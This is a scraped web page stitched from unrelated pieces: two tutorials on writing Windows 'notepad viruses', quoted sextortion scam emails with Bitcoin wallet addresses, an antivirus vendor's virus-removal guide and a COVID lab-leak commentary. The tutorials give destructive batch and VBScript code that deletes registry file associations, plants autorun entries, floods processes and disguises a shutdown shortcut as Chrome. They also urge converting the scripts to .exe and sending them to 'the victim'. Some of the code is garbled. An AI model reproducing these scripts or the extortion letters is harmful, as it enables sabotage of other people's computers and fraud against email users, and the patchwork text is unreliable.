Created to you вирус

Learn how to create a computer virus in less than 60 seconds: Almost every computer or laptop user has faced virus attack at least once in their life for sure, and we all know what is virus. Today we are going to describe five ways to create a virus in less than a minute. Go through the post to know about it.

T oday we are here with the method to Create a Virus in Less Than 60 seconds. Today in every second, a person is using a computer and almost every one of them knows about a virus. The virus is a malicious program that enters into the computer without your permission and can affect your data and operating system. Well, viruses are of different types as there are trojan horses and much more. However, have you ever thought about creating a virus? You can create one within seconds, and it is possible with some simple methods that I am going to discuss in this post.

How To Create Computer Virus in Less Than 60 Seconds

Many of you will think the methods must be on coding, but there is nothing like that. The tricks are based on the notepad. Just follow the below steps for creating a virus within a minute. Additionally, you can remove malware from your browser if it is infected. So, lets check out how to make a virus with notepad.

How to make a virus with notepad

Step 1. First of all, in your Windows OS, open the notepad.

Creating a Dangerous Virus

Step 2. Now copy and paste the below code in your notepad screen.

Step 3. Now save this file as virus.bat (you can select any of random name but .bat after that must be there).

Creating a Dangerous Virus

Now running the file will delete the C drive completely, and the operating system of the respective computer will get corrupted.

Note: This method is only for knowledge purpose. Don’t try this on your computer as it will completely format your C drive.

Open Notepad and Paste the following code into it and save it as CD-ROM.vbs or anything *.vbs

Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
For i = 0 to colCDROMs.Count – 1
End If
wscript.sleep 5000

When you double click on this file, you will be amazed at what this simple, harmless virus can do. Your CD/DVD drives will get continuously ejected.

To stop this virus, you need to open Task Manager and select process tab and end the wscript.exe file.

Open notepad and paste the given code and simply save the file as “EICAR.COM”

If you have an active antivirus, then your antivirus program will simply remove this file in no-time. This is the harmless virus that is used to check the security level of your antivirus.

This is a harmless virus and it will not destroy your PC. You can use this notepad virus scripts to prank your friends. This virus stops anyone’s internet access. You need to type
the following code in the notepad.

Now Save the file as a .bat format like internet.bat and sent it to your friends. The IP address will be lost, and therefore they won’t be able to fix it. Well, if you want to fix it. Simply type in IPconfig /renew. So, this is one of the best notepad virus prank.

Well, it’s not a virus. It is just a simple notepad trick that will let you see the string of green characters appearing randomly. It has nothing to do with your computer registry, batch, etc. You can use this trick to scare your friend because the screen looks like a virus affected.

Simply open Notepad and type the following code into it.

@echo off
color 02
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

Now save the file as Matrix.bat, and click on it and the show begins.

You can also create a virus that can shut down computers. Well, this virus is harmless but can cause data loss due to sudden shutdown. Here’s how you can make a shutdown virus to pull up a prank with your friends.

Step 1. First of all, right click on your desktop and then choose the option “Create Shortcut”

Shutdown virus

Step 2. Now in the pop-up window type in -s -t 60 -c “Virus Detection. The computer is shutting down.” Instead of 60, you can put what value you want. It represents the time in seconds.

Shutdown virus

Step 3. Then click on the Next button and type chrome. Or whatever you want.

Shutdown virus

Step 4. Then you need to change the icon of the shortcut, choose the icon of Google Chrome.

Shutdown virus

Your virus will look like Google Chrome. You can carry this file in your Pendrive and can shut down your friends’ computer.

Here are few other source codes to create a notepad virus on Windows computer. However, these viruses are dangerous and can destroy your computer. Therefore, don’t use this virus for evil purposes.

Note: The damages caused by these viruses are irreversible

The below code will disable anyone’s internet connectivity PERMANENTLY.

echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!

The below code will pop up endless notepads until the computer freezes and crashes!

@ECHO off
START %SystemRoot%\system32\notepad.exe
GOTO top

The below code will make the enter button pressed continuously

Set wshShell = wscript.CreateObject(”WScript.Shell”)
wscript.sleep 100
wshshell.sendkeys “

Before trying the notepad virus, please keep in mind that this is a dangerous and unrecoverable virus which can cause permanent damage to your operating system. Reinstalling Windows is the only option to recover from this dangerous virus.

START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
ECHO Your PC has been crashed.Your Dad.

This is another dangerous virus which can freeze computer in no-time. Basically, this virus will open different applications repeatedly which forces the computer to freeze. This virus can also damage your motherboard, so try this at your own risk.

@echo off
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x

You can add your own application in the above-given code.

So this is all about How To Create a Virus in Less Than 60 seconds. By this method, you can easily create the harmful and harmless virus and can make your friends fool. If you have some more tricks like this, you can share with us. Hope you like the post! Don’t forget to share this cool post with your friends.

H ave you ever thought of creating a computer virus by yourself? No need to worry, here is a complete tutorial to let you know how to create simple but dangerous Notepad Virus step by step with an explanation! 😎

As you all know that Virus is nothing but a malicious program which enters into a system without permission and affects the data and the working of the operating system. Viruses do unwanted tasks like replicating itself corrupting user files etc, so, basically, we are going to create some unwanted scripts, that which we can execute in order to destroy or break the system.

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Create Notepad Virus Executable(.exe) Using Batch Scripting

First of all, what is batch scripting, those who don’t know, take a look below:

“It is simply a text file, containing a series of commands, which are executed automatically, line by line when the batch file runs.”

By using Batch File you can create an extremely dangerous virus which can delete the Windows files, format different drives [C:\, E:], steal data files and information, disable antivirus, firewall, etc.

NOTE: This post is solely and mainly for educational purpose only. I am nowhere responsible for any kind of damage caused by this tutorial, for more info read our disclaimer.

Are you ready to create your first DIY Notepad virus, Let’s get started to rock,

First of all, you need a Windows PC, obviously. 😉

For this tutorial to create simple Notepad Virus you don’t need to be a die-hard programmer or something like that, but a basic knowledge of flow charts and loops helps you a lot to understand what’s going on here. So let’s start to create a trojan virus using notepad to run via command prompt(cmd) in Windows 10, 8/8.1, 7 or XP.

Now, Open the Notepad application and Copy (Ctrl+C) and Paste (Ctrl+V) the codes given below one by one for the different virus in a different file.

Note: I am not responsible for any damage or error reporting on Your PC, do it at your own risk.

Warning: Do not try this on your daily working PC.

Have you read my previous posts, it will be great to take a look at;

Notepad Virus source codes are Given below:

This code will disable the internet connectivity permanently.

This will delete key registry files, then loops a message

This is dangerous and unrecoverable Notepad Virus.

This will pop up endless notepads until the computer freezes and crashes

This will make the CD drives constantly pop out

This will make the enter button pressed continuously

It will start to open different applications repeatedly which will affect the system’s performance.

You can also add the application of your choice in the above code.

This will create unlimited no. of folders.

This will create large no. of the user account on one’s PC and goes on

This will create unlimited background processes

This will delete your whole C:\ drive and it really unrecoverable

This large code will disable any antivirus installed on the system

After copy-pasting any one of the viruses at a time in the Notepad, save the file in ALL FILES mode with an extension “.bat“(without quotes as shown in the image).

Save the file in ALL FILES mode with ‘.bat’ extension

DONE: You have successfully created a Notepad Virus. That’s it, now you’re done doing your work now just you have to send the file to the victim.

Done creating a batch file

There’s a drawback of a batch file notepad virus, that anyone can open it with notepad and read the commands easily, and delete it if found it harmful. So, to overcome this limitation/drawback, you can use a tool named ‘Batch to Executable Converter’. It will convert the ‘.bat‘ extension into ‘.exe‘ extension. Hence, your Batch file will be converted into a Windows Application. This will helps in convincing your victim to open the file.

Download BatToExe to Easily convert batch files to executables by clicking here

NOTE: This Tutorial is for windows based computer only, these viruses do not work on Linux or MAC.

Also Read:

So, Friends hope you liked the post on how to create a notepad virus using batch scripting, I made this tutorial much more descriptive, try to create these virus yourself, in case you encounter any problem and need help feel free to comment, I am always here for your help and don’t forget to share this post with your friends if you found it helpful and enjoyable, also for supporting me to come up with more stuff in the near future.

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account was hacked
Delete Message After Reading!
Security Warning
Your Account Was Hacked!

Текст письма один и тот же:

I'm a member of an international hacker group.

As you could probably have guessed, your account [Ваш адрес почтового ящика] was hacked, I sent message you from it.

Now I have access to you accounts! You still do not believe it?
So, this is your password: [реальный пароль, который Вы используете] , right?

Within a period from July 5, 2018 to September 21, 2018, you were infected by the virus we've created, through an adult website you've visited.
So far, we have access to your messages, social media accounts, and messengers.
Moreover, we've gotten full damps of these data.

We are aware of your little and big secrets. yeah, you do have them. We saw and recorded your doings on porn websites. Your tastes are so weird, you know..

But the key thing is that sometimes we recorded you with your webcam, syncing the recordings with what you watched!
I think you are not interested show this video to your friends, relatives, and your intimate one.

Transfer $700 to our Bitcoin wallet: 1DzM9y4fRgWqpZZCsvf5Rx4HupbE5Q5r4y
I guarantee that after that, we'll erase all your "data" :D

A timer will start once you read this message. You have 48 hours to pay the above-mentioned amount.

Your data will be erased once the money are transferred.
If they are not, all your messages and videos recorded will be automatically sent to all your contacts found on your devices at the moment of infection.

You should always think about your security. We hope this case will teach you to keep secrets.
Take care of yourself.

Тема письма: Account Issue

Новый текст писем:

I'm a member of an international hacker group.

As you could probably have guessed, your account [Ваш адрес почтового ящика] was hacked, because I sent message you from it.

Now I have access to you accounts!
For example, your password for [Ваш адрес почтового ящика] is [реальный пароль, который Вы используете]

Within a period from July 7, 2018 to September 23, 2018, you were infected by the virus we've created, through an adult website you've visited.
So far, we have access to your messages, social media accounts, and messengers.
Moreover, we've gotten full damps of these data.

We are aware of your little and big secrets. yeah, you do have them. We saw and recorded your doings on porn websites. Your tastes are so weird, you know..

But the key thing is that sometimes we recorded you with your webcam, syncing the recordings with what you watched!
I think you are not interested show this video to your friends, relatives, and your intimate one.

Transfer $700 to our Bitcoin wallet: 1Lughwk11SAsz54wZJ3bpGbNqGfVanMWzk
If you don't know about Bitcoin please input in Google "buy BTC". It's really easy.

I guarantee that after that, we'll erase all your "data" :D

A timer will start once you read this message. You have 48 hours to pay the above-mentioned amount.

Your data will be erased once the money are transferred.
If they are not, all your messages and videos recorded will be automatically sent to all your contacts found on your devices at the moment of infection.

Тема писем:
Your Secret Life

Hi, dear user of [домен почтового сервера, в котором расположен Ваш ящик]
We have installed one RAT software into you device.
For this moment your email account is hacked (see on , I messaged you from your account).
Your password for [адрес Вашего ящика ]: [пароль к Вашему ящику]

I have downloaded all confidential information from your system and I got some more evidence.
The most interesting moment that I have discovered are videos records where you masturbating.

I posted my virus on porn site, and then you installed it on your operation system.
When you clicked the button Play on porn video, at that moment my trojan was downloaded to your device.
After installation, your front camera shoots video every time you masturbate, in addition, the software is synchronized with the video you choose.

For the moment, the software has collected all your contact information from social networks and email addresses.
If you need to erase all of your collected data, send me $800 in BTC (crypto currency).
This is my Bitcoin wallet: 1PuYAe7BLxNE6F6zE2PeVthfXCeYH88PmQ
You have 48 hours after reading this letter.

After your transaction I will erase all your data.
Otherwise, I will send video with your pranks to all your colleagues and friends.

by Jonathan Lemonnier & Joseph Regan on January 30, 2020

Realizing your PC, Mac, or laptop might be infected with a virus or malware (malicious software) is worrying, but with careful and decisive action, removing a virus is quicker and easier than you might think.

How do I detect a virus on a Windows PC?

It’s not always obvious when your computer is infected. Some of the warning signs indicating that your PC or laptop might have a virus, Trojan, worm, or some other kind of malware are:

  • A very slow-running computer
  • Pop-up messages that appear out of nowhere and are hard to remove
  • Unrecognized computer programs launching on their own
  • The sound of the hard drive in constant action

Any one of these symptoms might be caused by a virus or a different kind of malware. If you’re experiencing two or three of them at the same time, that’s a strong indication that you’ve got a virus. That said, a lot of modern malware, like spyware and cryptominers, go out of their way to stay as hidden as possible.

To catch those, you’ll need to download an antivirus program now. You can download AVG AntiVirus FREE and have it running in just a few minutes. Antivirus programs come packed with scanners and other tools for finding viruses and malware, even if your computer isn’t exhibiting any of the symptoms.

If your PC or laptop does have a virus, take the following actions. (You’ll find Mac info at the bottom of the page.)

#1 Remove the virus

These steps should work no matter what kind of malware you have on your system. This procedure is as effective for Trojans or adware as it is for a run-of-the-mill virus.

  1. Hold the Shift key, then restart your computer by opening the Windows menu, clicking the power icon, and clicking Restart.
  2. Your computer will restart and display a menu with several advanced boot options. Choose Troubleshoot .

  3. Choose Advanced Options.

  4. Click Startup Settings.

  5. Click Restart.

  6. Press 5 to restart in Safe Mode with Networking, but keep your PC disconnected from the internet.

While you're in Safe Mode, delete your temporary files using the Disk Cleanup tool:

  1. Go to the Start menu and scroll down to Windows Administrative Tools. Click it and choose Disk Cleanup from the drop-down menu.

  2. Scroll through the “Files to delete” list, and choose Temporary files. Click OK.

    Deleting these files might speed up the virus scanning you’re about to do. Deleting your temporary files may even get rid of your malware if it was programmed to start when your computer boots up.

There are two types of scanners that can detect and delete computer viruses and malware: real-time and on-demand:

  1. A real-time scanner like AVG AntiVirus FREE scans for viruses in the background while you’re using your computer.
  2. An on-demand operating system scanner such as Microsoft Safety Scanner must be activated manually each time you want to scan.

Using both types of scanner might be necessary to remove the virus. If you don’t have a virus scanner installed, this is the time to reconnect to the internet and download one.

Even if you can’t connect to the internet, you might still be able to download Microsoft Safety Scanner because you started up your computer in Safe Mode with Networking.

Run the on-demand scanner first, then your real-time scanner. One of them should be able to identify the virus and remove it, but running both scanners increases your odds of success.

Some malware must be removed manually. You should only attempt this if you are experienced with using the Windows Registry and know how to view and delete system and program files. If you’re not sure, contact an IT expert who specializes in removing viruses.

#2 Recover or reinstall any damaged files or software

Assuming the scan detected and removed the virus, you might need to reinstall any files or programs that were damaged.

This is where backups come in handy, and we strongly recommend you make them regularly, at least once a week. That makes it easy to restore deleted files on Windows and Mac devices. For best results, make sure to get an external hard drive.

#3 Improve your defenses

Keep your protection up to date

Update your antivirus software to help protect your laptop or PC against all types of malware. It’s critical to keep your cybersecurity tool current because new viruses are being created all the time. Even if you bought your antivirus a month ago, it might need updating now. Check out AVG’s antivirus solutions — they install quickly and update automatically for effortless protection.

Make backups

Make regular backups of your files and store them on an external hard drive, with a cloud service, or both. This can help prevent the loss of important information should you get another malware infection. If you haven't been making backups, now is a good time to start.

#4 Take proactive steps to prevent another infection

Here are some quick and easy things you can do to avoid downloading any more malware again:

Install the latest software updates for Windows

Back up your data regularly

Avoid clicking on pop-up messages that claim to have detected a problem with your computer

Be wary of opening emails from addresses you don’t recognize, especially if they contain a link or an attachment

Getting rid of a virus or malware on a Mac

Many Mac users think they can’t get viruses, spyware, worms, or other malware. This isn’t true, even though there are fewer viruses and malware targeting Macs than there are for Windows PCs and laptops. We've got an in-depth guide to Mac security, but we'll give you a quick rundown here.

Some well-known examples of malware for Mac computers include:

These names give the impression of being antivirus products, but they are all malicious and designed to fool Mac users into submitting their credit card or Apple ID account details. Do not download them.

The two main risks Mac users face are false alert messages and previously installed malware. If you see any kind of message while browsing the internet along the lines of “a problem has been detected with your Mac,” this is highly likely to be an attempt to get you to download malware. Instead, make the following tips part of your daily Mac habits.

  • Ignore the message. If you did download anything from the site, quit Safari (or whichever browser you’re using), go to the Downloads folder, and drag any items in there to the Trash. Then empty the Trash. Avoid visiting the website again because it’s possible that it has been hacked.
  • Quit the infected app. If you think malware has already been installed on your Mac — especially if you’re seeing pop-up messages asking for your Apple ID or credit card details — quit the app / software you think might be infected. Open your Activity Monitor and locate the app in question, or search for the malware named above. When you’ve identified the malware, click the Quit Process button, then quit the Activity Monitor. Then go into your Applications folder and drag the unwanted software into the Trash, and empty the Trash.
  • Finally, make sure all your software and apps are up to date. Also confirm that you’ve installed the latest OS fixes and updates directly from Apple.

As with a PC, it is a good idea to add protection. AVG AntiVirus for Mac is a free and comprehensive cybersecurity tool that detects and blocks viruses, spyware, ransomware and other malware in real time. It’s updated automatically to safeguard your Mac against the latest online threats. AVG AntiVirus for Mac also helps you protect your family and friends — by detecting any PC or mobile threats hiding on your system, we’ll prevent you from accidentally infecting anyone else.

Here is a 3D image of the severe acute respiratory syndrome coronavirus 2 (SARS-CoV-2), formerly . [+] known as the 2019 novel coronavirus (2019-nCoV). (Image: Getty)

Don’t you just love conspiracy theories? Especially when two groups of people have pretty much the same conspiracy theory about each other?

Some folks including politicians in both the U.S. and China have suggested that the COVID-19 coronavirus (SARS-CoV2) that’s causing the pandemic may actually be a bioweapon that was manufactured in a lab. The only difference between their conspiracy theories is who’s being accused of doing the manufacturing.

On the one corner are some people in the U.S. who are hinting or in some cases openly claiming that China put together this virus. For example, look at what Senator Tom Cotton (R-Arkansas) tweeted out back on January 30:

Then, Steve Mosher wrote on February 22 an opinion piece for the New York Post entitled, “Don’t buy China’s story: The coronavirus may have leaked from a lab.” Take a wild guess at what Mosher wrote about in his piece. By the way, Mosher is not a biomedical scientist, but instead is the president of the Population Research Institute and author of book called Bully of Asia: Why China’s ‘Dream’ Is the New Threat to World Order. So chances are that he didn’t love China in the first place. But who knows, love works in mysterious ways.

So what evidence have Cotton, Mosher, and others provided to support these suggestions or claims? Incriminating pictures? Suspicious emails? Some awkward selfies? Any kind of scientific evidence?

Well, as Cotton picked out, there just happens to be a biosafety level-four (BSL-4) laboratory situated in Wuhan, China, the city where the whole outbreak started. Oh, and the lab had housed some types of coronaviruses among other pathogens. Yep, that’s the evidence.

As you probably know, proximity alone should not imply guilt. That would be like claiming that you farted whenever there’s a bad smell and you happen to be in the vicinity. Sure you may have intestines but that doesn’t mean that every foul stench emanated from your guts.

Plus, it’s a lot easier to leak a pocket of air though your butt than a virus from a BSL-4 facility. BSL-4 facilities maintain the highest level of security among bio-laboratories since they do work on dangerous potentially life-threatening agents such as the Ebola, Lassa fever, and Marburg viruses. So it’s not as if the people inside these labs are playing throw and catch with the viruses and stuffing them into their pockets. To be designated as a BSL-4, the lab has to have the appropriate ventilation systems, reinforced walls, security systems, and construction to keep the wrong things inside and the right things outside.

Is it unusual then to have a BSL-4 facility in a city like Wuhan, China? Not really. There are already at least six BSL-4 facilities in the U.S. in Atlanta, GA, Frederick, MD, Galveston, TX, Hamilton, MT, and San Antonio, TX. According to the Federation of American Scientists website, seven others may be planned, under construction, or possibly finished in various cities such as Boston, MA, and Richmond, VA. These labs in the U.S. also study and house a range of dangerous pathogens. So again having a lab that studies bad pathogens does not mean that the lab released anything.

Not to be outdone, some in China have made similar suggestions, except that it’s the U.S. that built the virus and released it in China. Well, that’s original. For example, take a look at these three tweets from Zhao Lijian, Spokesperson and Deputy Director General, Information Department for the Foreign Ministry of China:

Yes, the claim is that the U.S. released a virus in China so that the U.S. can then eventually suffer the consequences of the spreading virus just a couple months later. Makes a whole lotta sense, except that it doesn’t. Where exactly is the real evidence that the U.S. military created SARS-CoV2?

The back-and-forth dialogue has continued with President Donald Trump then referring to SARS-CoV2 as the “Chinese Virus” as can be seen here:

When questioned why he was using this label rather than the real scientific name of the virus, Trump claimed that it was in response to the claim that the U.S. military had created the virus. The video accompanying the following tweet shows the exchange:

Back and forth. Back and forth. Back and forth.

So, it looks like conspiracy theorists on both sides haven’t really provided any compelling evidence that SARS-CoV2 was produced in a lab, whether in the U.S., in China, or in the Hogwarts School of Witchcraft and Wizardry.

In fact, there is not only a lack of evidence supporting these conspiracy theories, there has been growing strong scientific evidence against both of them. Scientists, you know the ones who are actually trying to find the truth and solve a problem rather than blame people, have been conducting genetic analyses to determine where the virus came from and how it ended up infecting humans. Although viruses aren’t exactly like people as they don’t seem to have feelings or spread rumors, viruses do have genetic material like people, except their genetic material is not quite as complex as those of humans. Nevertheless, like humans, viruses still pass along such materials when they replicate and evolve. It’s not as simple as The Jerry Springer Show using genetic testing to find out if a guy is someone’s father, but scientists can use more advanced genetic analysis to figure out the origins, the “family tree” of SARS-CoV2.

Indeed, strong clues had already emerged by February 26, 2020, when a Perspectives piece was published in the New England Journal of Medicine. In the piece, David M. Morens, M.D. and Peter Daszak, Ph.D. from the National Institute of Health (NIH) and Jeffery K. Taubenberger, M.D., Ph.D. wrote: “Of course, scientists tell us that SARS-CoV-2 did not escape from a jar: RNA sequences closely resemble those of viruses that silently circulate in bats, and epidemiologic information implicates a bat-origin virus infecting unidentified animal species sold in China’s live-animal markets.”

This wasn’t exactly a case of same bat channel, same bat time. But the first, more deadlier SARS virus seemed to cause the 2002-2003 outbreak after it had managed to jump from bats to humans via intermediate hosts such as masked palm civets. Yes, some masked beings may have inadvertently partnered with bats to bring the original SARS virus to humans. So it wouldn’t be too surprising if something like that happened again for SARS-CoV2.

This illustration shows a close-up of the protein spikes on SARS-CoV2. (Image: Getty)

Even more evidence of a natural rather than human-made origin for SARS-CoV2 has emerged from a study described in a research letter just published in Nature Medicine. In the letter, a research team (Kristian G. Andersen from The Scripps Research Institute, Andrew Rambaut from the University of Edinburgh, W. Ian Lipkin from the Mailman School of Public Health of Columbia University, Edward C. Holmes from The University of Sydney and Robert F. Garry from Tulane University) described how they had analyzed the genetic sequences that code for the protein spikes on the surface of SARS-CoV2. The virus looks sort of like a medieval mace with multiple spikes sticking out from its spherical shape. These spikes aren’t just for show as the virus uses them to latch on to a cell that it wants to invade and then push its way into the cell. Very medieval stuff.

Apparently, portions of these spike proteins are so effective in targeting specific receptors on human cells that it is hard to imagine humans manufacturing them, not with known existing technology. The researchers then concluded that this feature and thus the new coronavirus could have in all likelihood only evolved over time naturally. You see humans can make useful stuff like ride-sharing apps but are still quite puny compared to nature when it comes to making stuff like viruses.

In fact, the research team found that the SARS-CoV-2 structure in general is quite different from what humans would have likely concocted. If a human had wanted to create a viral weapon, he or she would have started with the structure of a virus that’s already known to cause illness in people. Naturally, if you want to make a weapon, you may want to start with something like a grenade launcher rather than a smoothie maker, not that the virus looks like either. Instead, the structure of SARS-CoV2 is quite similar to those of viruses known to infect bats and pangolins.

So all of this further supports the theory that the virus jumped from bats to humans via some intermediate animal host. This doesn’t necessarily mean that the virus started causing trouble as soon as it started infecting humans. An alternative possibility is that it jumped a longer time ago and hung out among humans for a while before eventually evolving into its current troublesome selves. This latter possibility would be somewhat analogous to inviting someone to live with you because he or she initially seemed relatively harmless but then over time finding out that this flat mate has become a terror.

The findings from the genetic analyses are consistent with how SARS-CoV2 is currently behaving. The virus is not acting like a bio-weapon right now. The best bio-weapons kill at a much higher rate and can be readily transported and released. Imagine being told that a bio-weapon might take the lives of 1% to 3.4% of the people that it infects but you don’t quite know specifically which ones. The difference between SARS-CoV2 and pathogens like the Ebola Virus or anthrax is like the difference between a bunch of sofas and a collection of missiles. Sure, the former can cause harm but not in a predictable and consistent manner. If someone actually decided to develop SARS-CoV2 as a bio-weapon, that person needs to find a new job.

So there you have it: scientific evidence trumping conspiracy theories. Will all of these scientific findings finally quash the “virus-was-made-in-a-lab-and-it-is-your-fault” rhetoric between the politicians and on social media? Probably not. Since when has science stopped such political rhetoric. Maybe, though, it will get more people to focus on the much more important matter at hand: trying to control this pandemic together.

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